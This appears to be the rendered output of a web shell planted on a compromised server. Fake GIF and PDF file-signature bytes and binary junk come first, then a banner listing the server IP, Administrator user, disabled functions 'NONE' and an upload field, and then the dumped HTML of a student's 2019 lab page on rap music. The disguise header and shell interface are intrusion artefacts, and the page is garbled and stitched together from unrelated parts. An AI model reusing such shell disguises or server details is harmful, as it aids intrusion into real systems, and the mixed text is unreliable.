GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Classes/CST1021/Labs/Lab14/MMDT1021-SamuelMulder-Lab14/Final/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <title>Final Rap - Samuel Mulder</title> <meta charset="UTF-8"> <link href="Lab14.css" rel="stylesheet" type="text/css"> </head> <body> <ul> <li><a href="lab14a.htm">Home</a></li> <li><a href="lab14b.htm">Rock</a></li> <li><a href="lab14c.htm">Metal</a></li> <li><a class="active" href="lab14d.htm">Rap</a></li> <li><a href="lab14e.htm">EDM</a></li> </ul> <br><h1>Rap Music</h1><br> <img alt="Rap" src="rap.jpg"> <article> <h2>Some Information</h2><br> <p>Hip hop music, also called hip-hop or rap music, is a genre of popular music developed in the United States by inner-city African Americans and Latino Americans in the Bronx borough of New York City in the 1970s. It consists of a stylized rhythmic music that commonly accompanies rapping, a rhythmic and rhyming speech that is chanted. </p> <p>It developed as part of hip hop culture, a subculture defined by four key stylistic elements: MCing/rapping, DJing/scratching with turntables, break dancing, and graffiti writing. Other elements include sampling beats or bass lines from records (or synthesized beats and sounds), and rhythmic beatboxing. While often used to refer solely to rapping, "hip hop" more properly denotes the practice of the entire subculture. The term hip hop music is sometimes used synonymously with the term rap music, though rapping is not a required component of hip hop music; the genre may also incorporate other elements of hip hop culture, including DJing, turntablism, scratching, beatboxing, and instrumental tracks. </p> </article><br><br> <h2>Top 5 Rap Songs</h2><br> <table class="center"> <tr> <th>Top 5</th> <th>Song Name</th> <th>Artist</th> <th>Link</th> </tr> <tr> <td>1</td> <td>Do The Talking</td> <td>Lucidious</td> <td><a href="https://youtu.be/f3zvyCKOcgM" target="_blank">YouTube</a></td> </tr> <tr> <td>2</td> <td>Pretty Lights</td> <td>Marvin Divine</td> <td><a href="https://youtu.be/wdasL9aqp3g" target="_blank">YouTube</a></td> </tr> <tr> <td>3</td> <td>Gravedigger</td> <td>P.O.S.</td> <td><a href="https://youtu.be/KlBGZ-Iof_s" target="_blank">YouTube</a></td> </tr> <tr> <td>4</td> <td>Slide</td> <td>Calvin Harris</td> <td><a href="https://youtu.be/8Ee4QjCEHHc" target="_blank">YouTube</a></td> </tr> <tr> <td>5</td> <td>What's Wrong With Me</td> <td>Montana of 300</td> <td><a href="https://youtu.be/m1l_VWN9aa4" target="_blank">YouTube</a></td> </tr> </table> <h3>©2019 Sam Mulder</h3> </body> </html>